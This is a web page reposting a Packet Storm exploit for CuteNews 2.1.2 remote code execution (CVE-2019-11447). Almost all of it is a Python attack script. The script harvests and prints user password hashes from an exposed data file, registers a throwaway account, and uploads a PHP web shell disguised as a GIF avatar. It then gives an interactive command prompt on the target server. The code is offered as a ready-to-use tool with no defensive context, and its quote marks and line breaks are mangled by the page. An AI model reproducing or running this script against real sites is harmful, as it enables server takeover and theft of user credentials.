CuteNews 2.1.2 Remote Code Execution ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on September 12th, 2020 📆 | 2989 Views ⚑

0

CuteNews 2.1.2 Remote Code Execution ≈ Packet Storm

# Exploit Title: CuteNews 2.1.2 – Remote Code Execution
# Google Dork: N/A
# Date: 2020-09-10
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://cutephp.com/cutenews/downloading.php
# Software Link: https://cutephp.com/cutenews/downloading.php
# Version: CuteNews 2.1.2
# Tested on: Ubuntu 20.04, CuteNews 2.1.2
# CVE : CVE-2019-11447

#! /bin/env python3

import requests
from base64 import b64decode
import io
import re
import string
import random
import sys

banner = “””

_____ __ _ __ ___ ___ ___
/ ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ |
/ /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/
___/_,_/__/__/_/|_/__/|__,__/___/ /____(_)_(_)____/
___ _________
/ _ / ___/ __/
/ , _/ /__/ _/
/_/|_|___/___/

“””
print (banner)
print (“[->] Usage python3 expoit.py”)
print ()
sess = requests.session()
payload = “GIF8;n< ?php system($_REQUEST['cmd']) ?>“
ip = input(“Enter the URL> “)
def extract_credentials():
global sess, ip
url = f”{ip}/CuteNews/cdata/users/lines”
encoded_creds = sess.get(url).text
buff = io.StringIO(encoded_creds)
chash = buff.readlines()
if “Not Found” in encoded_creds:
print (“[-] No hashes were found skipping!!!”)
return
else:
for line in chash:
if “< ?php die('Direct call - access denied'); ?>” not in line:
credentials = b64decode(line)
try:
sha_hash = re.search(‘”pass”;s:64:”(.*?)”‘, credentials.decode()).group(1)
print (sha_hash)
except:
pass
def register():
global sess, ip
userpass = “”.join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))
postdata = {
“action” : “register”,
“regusername” : userpass,
“regnickname” : userpass,
“regpassword” : userpass,
“confirm” : userpass,
“regemail” : f”{userpass}@hack.me”
}
register = sess.post(f”{ip}/CuteNews/index.php?register”, data = postdata, allow_redirects = False)
if 302 == register.status_code:
print (f”[+] Registration successful with username: {userpass} and password: {userpass}”)
else:
sys.exit()
def send_payload(payload):
global ip
token = sess.get(f”{ip}/CuteNews/index.php?mod=main&opt=personal”).text
signature_key = re.search(‘signature_key” value=”(.*?)”‘, token).group(1)
signature_dsi = re.search(‘signature_dsi” value=”(.*?)”‘, token).group(1)
logged_user = re.search(‘disabled=”disabled” value=”(.*?)”‘, token).group(1)
print (f”signature_key: {signature_key}”)
print (f”signature_dsi: {signature_dsi}”)
print (f”logged in user: {logged_user}”)

files = {
“mod” : (None, “main”),
“opt” : (None, “personal”),
“__signature_key” : (None, f”{signature_key}”),
“__signature_dsi” : (None, f”{signature_dsi}”),
“editpassword” : (None, “”),
“confirmpassword” : (None, “”),
“editnickname” : (None, logged_user),
“avatar_file” : (f”{logged_user}.php”, payload),
“more[site]” : (None, “”),
“more[about]” : (None, “”)
}
payload_send = sess.post(f”{ip}/CuteNews/index.php”, files = files).text
print(“============================nDropping to a SHELLn============================”)
while True:
print ()
command = input(“command > “)
postdata = {“cmd” : command}
output = sess.post(f”{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php”, data=postdata)
if 404 == output.status_code:
print (“sorry i can’t find your webshell try running the exploit again”)
sys.exit()
else:
output = re.sub(“GIF8;”, “”, output.text)
print (output.strip())

if __name__ == “__main__”:
print (“================================================================nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHNn================================================================”)
extract_credentials()
print (“================================================================”)
print()
print (“=============================nRegistering a usersn=============================”)
register()
print()
print(“=======================================================nSending Payloadn=======================================================”)
send_payload(payload)
print ()

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...